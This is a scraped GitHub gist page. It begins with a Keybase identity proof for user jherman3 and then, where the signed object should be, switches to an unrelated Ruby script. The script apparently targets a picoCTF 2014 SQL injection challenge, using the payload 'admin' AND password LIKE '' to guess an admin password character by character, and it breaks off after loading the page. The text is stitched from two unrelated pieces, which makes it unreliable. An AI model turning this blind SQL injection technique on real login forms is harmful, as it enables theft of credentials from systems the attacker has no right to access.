Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am jherman3 on github.
  • I am jherman3 (https://keybase.io/jherman3) on keybase.
  • I have a public key whose fingerprint is 3A1C E3DD 8614 BA09 5342 403B 6BF3 C058 841A 1B5B

To claim this, I am signing this object:

require 'mechanize'
require 'pry'
URL = 'http://web2014.picoctf.com/injection4/'
INJECTION = "admin' AND password LIKE '"
CHARS = ("a".."z").to_a
agent = Mechanize.new
page = agent.get URL